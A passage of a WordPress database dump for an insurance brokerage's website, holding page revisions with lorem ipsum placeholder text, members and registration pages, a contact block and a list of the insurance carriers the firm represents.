size-medium wp-image-57\" src=\"http://localhost/empire/wp-content/uploads/2014/04/news-post-300x120.png\" alt=\"news-post\" width=\"300\" height=\"120\" /></a></div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','News','','inherit','open','open','','10-revision-v1','','','2014-04-28 07:24:31','2014-04-28 07:24:31','',10,'http://localhost/empire/?p=167',0,'revision','',0),(168,1,'2014-04-28 07:27:08','2014-04-28 07:27:08','<div class=\"line\"></div>\r\n<div class=\"page-post-info\">Posted at 03:41 PM ET, 11/23/2013</div>\r\n<div class=\"page-post-title\">Lorem ipsum dolor sit amet, consectetur lorem</div>\r\n<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"page-post-image\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/news-post.png\"><img class=\"alignnone size-medium wp-image-57\" src=\"http://localhost/empire/wp-content/uploads/2014/04/news-post-300x120.png\" alt=\"news-post\" width=\"300\" height=\"120\" /></a></div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','News','','inherit','open','open','','10-revision-v1','','','2014-04-28 07:27:08','2014-04-28 07:27:08','',10,'http://localhost/empire/?p=168',0,'revision','',0),(169,1,'2014-04-28 11:29:47','2014-04-28 11:29:47','[wp-members page=\"register\"]','Register','','publish','open','open','','register','','','2014-04-28 11:29:47','2014-04-28 11:29:47','',0,'http://localhost/empire/?page_id=169',0,'page','',0),(170,1,'2014-04-28 11:24:07','2014-04-28 11:24:07','[wp-members page=\"register\"]','Register','','inherit','open','open','','169-revision-v1','','','2014-04-28 11:24:07','2014-04-28 11:24:07','',169,'http://localhost/empire/?p=170',0,'revision','',0),(171,1,'2014-04-28 11:32:01','2014-04-28 11:32:01','[wp-members page=\"members-area\"]','Members','','publish','open','open','','members','','','2014-04-28 11:32:01','2014-04-28 11:32:01','',0,'http://localhost/empire/?page_id=171',0,'page','',0),(172,1,'2014-04-28 11:32:01','2014-04-28 11:32:01','[wp-members page=\"members-area\"]','Members','','inherit','open','open','','171-revision-v1','','','2014-04-28 11:32:01','2014-04-28 11:32:01','',171,'http://localhost/empire/?p=172',0,'revision','',0),(177,1,'2014-04-29 06:16:59','2014-04-29 06:16:59','\r\n<div class=\"col-sm-5\">\r\n<div class=\"contact-address\">\r\n<div class=\"title\">\r\n\r\nEmpire Insurance Brokerage\r\n\r\n</div>\r\n38 Skillman Street\r\n\r\nBrooklyn, NY 11205\r\n\r\nphone (718) 218-9647\r\n\r\nfax (718)-599-1440\r\n\r\n<a href=\"#\">info@empireins.com</a>\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-7\">[map]</div>','contact us','','inherit','open','open','','8-revision-v1','','','2014-04-29 06:16:59','2014-04-29 06:16:59','',8,'http://localhost/empire/?p=177',0,'revision','',0),(178,1,'2014-04-29 06:19:20','2014-04-29 06:19:20','<div class=\"line\"></div>\r\n<div class=\"page-post-info\">Posted at 03:41 PM ET, 11/23/2013</div>\r\n<div class=\"page-post-title\">Lorem ipsum dolor sit amet, consectetur lorem</div>\r\n<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"page-post-image\"><a href=\"http://localhost/empire/wp-content/uploads/2014/04/news-post.png\"><img class=\"alignnone size-medium wp-image-57\" src=\"http://localhost/empire/wp-content/uploads/2014/04/news-post-300x120.png\" alt=\"news-post\" width=\"300\" height=\"120\" /></a></div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','insentives','','inherit','open','open','','10-revision-v1','','','2014-04-29 06:19:20','2014-04-29 06:19:20','',10,'http://localhost/empire/?p=178',0,'revision','',0),(179,1,'2014-04-29 06:19:59','2014-04-29 06:19:59','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','about us','','inherit','open','open','','9-revision-v1','','','2014-04-29 06:19:59','2014-04-29 06:19:59','',9,'http://localhost/empire/?p=179',0,'revision','',0),(180,1,'2014-04-29 06:20:21','2014-04-29 06:20:21','','news','','inherit','open','open','','14-revision-v1','','','2014-04-29 06:20:21','2014-04-29 06:20:21','',14,'http://localhost/empire/?p=180',0,'revision','',0),(181,1,'2014-04-29 06:21:46','2014-04-29 06:21:46','','Agent Tools','','publish','open','open','','agent-tools','','','2016-01-11 17:30:31','2016-01-11 17:30:31','',0,'http://localhost/empire/?page_id=181',0,'page','',0),(182,1,'2014-04-29 06:21:46','2014-04-29 06:21:46','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','Agent Tools','','inherit','open','open','','181-revision-v1','','','2014-04-29 06:21:46','2014-04-29 06:21:46','',181,'http://localhost/empire/?p=182',0,'revision','',0),(183,1,'2014-04-29 06:22:24','2014-04-29 06:22:24','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','Licensing: Original','','draft','open','open','','licencing','','','2015-07-25 15:10:03','2015-07-25 15:10:03','',0,'http://localhost/empire/?page_id=183',0,'page','',0),(184,1,'2014-04-29 06:22:24','2014-04-29 06:22:24','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','Licencing','','inherit','open','open','','183-revision-v1','','','2014-04-29 06:22:24','2014-04-29 06:22:24','',183,'http://localhost/empire/?p=184',0,'revision','',0),(185,1,'2014-04-29 06:22:52','2014-04-29 06:22:52','<div>EIB represents a full suite of carriers across three primary markets: Life Insurance, Annuities and Long-Term Care Insurance. Whether in the specialized market of New York or the balance of the 50 states, we have the carriers and products needed to deliver a superior outcome for your next client\'s insurance needs.</div>\r\n\r\n<hr />\r\n\r\n<h1>Life Insurance Carriers</h1>\r\n<a href=\"http://www.empireins.com/life-product-search/\" target=\"_blank\">Follow this link for more information about our Life Insurance Carriers and Products</a>\r\n<div class=\"about-content\">\r\n<ul>\r\n <li>American General Life Companies</li>\r\n <li>American National (ANICO)\r\nAmeritas Life / Ameritas Life of NY\r\nAthene\r\nAthene NY</li>\r\n <li>AXA\r\nBanner Life\r\nCompanion of New York\r\nFirst MetLife Investors Insurance Company\r\nGenworth Life and Annuity Insurance Company\r\nGenworth Life Insurance Company\r\nGenworth Life Insurance Company of New York</li>\r\n <li>Guardian Life\r\nHartford\r\nJohn Hancock\r\nLincoln National Life Insurance Company</li>\r\n <li>Mass Mutual\r\nMetLife (All Companies)\r\nMinnesota Life</li>\r\n <li>National Life of Vermont\r\nNationwide</li>\r\n <li>Penn Mutual\r\nPrincipal Life Insurance Company\r\nPrincipal National Life Insurance Company</li>\r\n <li>Protective Life\r\nProtective Life and Annuity of NY\r\nPrudential Financial</li>\r\n <li>New York Life\r\nReliastar Life Insurance Company\r\nReliastar Life Insurance Company of New York\r\nSBLI (Savings Bank Life Insurance Co of Mass)\r\nSecurian Life Insurance Company\r\nSecurity Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Symetra Financial\r\nTransamerica Financial Life Insurance Co\r\nTransamerica Life Insurance Co.\r\nUnited of Omaha</li>\r\n <li>US Life\r\nVoya Financial\r\nWilliam Penn</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Annuity Carriers</h1>\r\n<a href=\"http://www.empireins.com/annuity-product-search/\" target=\"_blank\">Follow this link for more information about our Annuity Carriers and Products</a>\r\n<ul>\r\n <li>AIG Annuities Fixed & Index</li>\r\n <li>AIG Annuities Fixed & Index of NY</li>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>American General Life Companies - All states except NY (AGL)</li>\r\n <li>American National</li>\r\n <li>Ameritas Life / Ameritas Life of NY</li>\r\n <li>Athene</li>\r\n <li>Athene Annuity & Life Assurance Company</li>\r\n <li>Columbus Life Insurance Company</li>\r\n <li>Companion of New York</li>\r\n <li>EquiTrust Life</li>\r\n <li>Fidelity & Guaranty Life</li>\r\n <li>Fidelity & Guaranty Life of NY</li>\r\n <li>First MetLife Investors Insurance Company</li>\r\n <li>Genworth Life and Annuity Insurance Company</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>Integrity Life Insurance Company</li>\r\n <li>Jackson National Life</li>\r\n <li>Jackson National Life of New York</li>\r\n <li>Lincoln National Life Insurance Company</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>National Integrity Life Insurance Company</li>\r\n <li>National Life Group - Life Ins. Co. of the Southwest</li>\r\n <li>Nationwide</li>\r\n <li>New York Life</li>\r\n <li>North American Company for Life and Health Insurance®</li>\r\n <li>Penn Mutual</li>\r\n <li>Principal Life Insurance Company</li>\r\n <li>Protective Life</li>\r\n <li>Reliance Standard Life</li>\r\n <li>Security Mutual Life Insurance Company of New York, Binghamton, NY</li>\r\n <li>Standard Insurance Company</li>\r\n <li>United of Omaha</li>\r\n <li>Voya Insurance and Annuity Company</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h1>Long-Term Care Insurance Carriers</h1>\r\n<ul>\r\n <li>Allianz Life Insurance Company of North America</li>\r\n <li>Athene NY</li>\r\n <li>Genworth Life Insurance Company</li>\r\n <li>Genworth Life Insurance Company of New York</li>\r\n <li>John Hancock</li>\r\n <li>MassMutual</li>\r\n <li>MetLife (All Companies)</li>\r\n <li>Mutual of Omaha</li>\r\n <li>New York Life</li>\r\n <li>Prudential Financial</li>\r\n</ul>\r\n<h3></h3>\r\n</div>','Carriers','','publish','open','open','','carriers','','','2015-11-07 16:00:36','2015-11-07 16:00:36','',0,'http://localhost/empire/?page_id=185',0,'page','',0),(186,1,'2014-04-29 06:22:52','2014-04-29 06:22:52','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. Aliquam sed ligula diam, et laoreet odio.\r\n<ul>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n <li><i class=\"icon-circle\"></i>List Item</li>\r\n</ul>\r\nNunc imperdiet ipsum quis purus porta sagittis ac sed arcu. Nulla placerat urna vestibulum elit sodales utimperdiet felis lobortis. Cras ornare luctus elit, at rhoncus ipsum rhoncus at. Lorem ipsum dolor sit amet, consecteturadipiscing elit. Integer quis feugiat nulla. Sed sem sapien, sollicitudin vitae lobortis a, consectetur nec nunc. Nunc congue felis at lorem ultricies aliquam. Quisque at leo in mi vulputate feugiat et eu magna.\r\n<p class=\"left-pragraph\">Curabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. . Donec eget ipsum nunc, in pharetra purus. Mauris eget laoPellentesque habitant morbi tristique seneestas.</p>\r\n\r\n<blockquote>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</blockquote>\r\nClass aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n\r\n</div>','Carriers','','inherit','open','open','','185-revision-v1','','','2014-04-29 06:22:52','2014-04-29 06:22:52','',185,'http://localhost/empire/?p=186',0,'revision','',0),(189,1,'2014-04-29 06:24:26','2014-04-29 06:24:26',' ','','','publish','open','open','','189','','','2015-12-11 09:02:53','2015-12-11 09:02:53','',0,'http://localhost/empire/?p=189',5,'nav_menu_item','',0),(207,1,'2014-04-30 09:11:38','2014-04-30 09:11:38','','blog-post-1','','inherit','open','open','','blog-post-1','','','2014-04-30 09:11:38','2014-04-30 09:11:38','',0,'http://localhost/empire/wp-content/uploads/2014/04/blog-post-1.png',0,'attachment','image/png',0),(218,1,'2014-04-30 09:48:12','2014-04-30 09:48:12','','Joel Zicherman','','publish','closed','closed','','joel-zicherman','','','2015-08-20 21:39:22','2015-08-20 21:39:22','',0,'http://localhost/empire/?post_type=clients&p=218',0,'clients','',0),(220,1,'2014-04-30 09:43:50','2014-04-30 09:43:50','','Chaya Lev','','inherit','open','open','','129-autosave-v1','','','2014-04-30 09:43:50','2014-04-30 09:43:50','',129,'http://localhost/empire/?p=220',0,'revision','',0),(221,1,'2014-04-30 09:45:36','2014-04-30 09:45:36','','Roisy Braver','','inherit','open','open','','131-autosave-v1','','','2014-04-30 09:45:36','2014-04-30 09:45:36','',131,'http://localhost/empire/?p=221',0,'revision','',0),(222,1,'2014-04-30 09:49:04','2014-04-30 09:49:04','','Cheskel Braver','','publish','closed','closed','','cheskel-braver','','','2015-08-20 21:39:16','2015-08-20 21:39:16','',0,'http://localhost/empire/?post_type=clients&p=222',0,'clients','',0),(223,1,'2014-04-30 09:56:43','2014-04-30 09:56:43','','Commissions Department','','publish','closed','closed','','malky-fleischman','','','2015-11-07 15:15:30','2015-11-07 15:15:30','',0,'http://localhost/empire/?post_type=clients&p=223',0,'clients','',0),(225,1,'2014-04-30 09:58:12','2014-04-30 09:58:12','','Gitty Braver','','publish','closed','closed','','gitty-braver','','','2015-08-20 21:36:41','2015-08-20 21:36:41','',0,'http://localhost/empire/?post_type=clients&p=225',0,'clients','',0),(226,1,'2014-04-30 09:58:52','2014-04-30 09:58:52','','David Braver','','publish','closed','closed','','david-braver','','','2015-08-20 21:36:20','2015-08-20 21:36:20','',0,'http://localhost/empire/?post_type=clients&p=226',0,'clients','',0),(229,1,'2014-04-30 18:36:03','2014-04-30 18:36:03','<div class=\"page-post-sub-content\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed pharetra nisi in velit scelerisque condimentum. Interdum et malesuada fames ac ante ipsum primis in faucibus.</div>\r\n<div class=\"about-content\">\r\n\r\nCurabitur orci risus, cursus at vestibulum et, tincidunt at mauris. Donec eget ipsum nunc, in pharetra purus. Mauris eget laoreet dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Donec ut libero orci. Nunc eleifend mauris at augue eleifend sed eleifend sapien dapibus. Aliquam id odio vitae ipsum fringilla varius id ac magna. Fusce lorem turpis, volutpat eu bibendum id, luctus tincidunt leo.\r\n<h1>H1 - Donec interdum vestibulum est</h1>\r\n<h2>H2 - Donec interdum vestibulum est</h2>\r\n<h3>H2 - Donec interdum vestibulum est</h3>\r\n<h4>H2 - Donec interdum vestibulum est</h4>\r\nIntro text to the company Proin consequat erat ac urna iaculis rutrum ut sit amet dui. 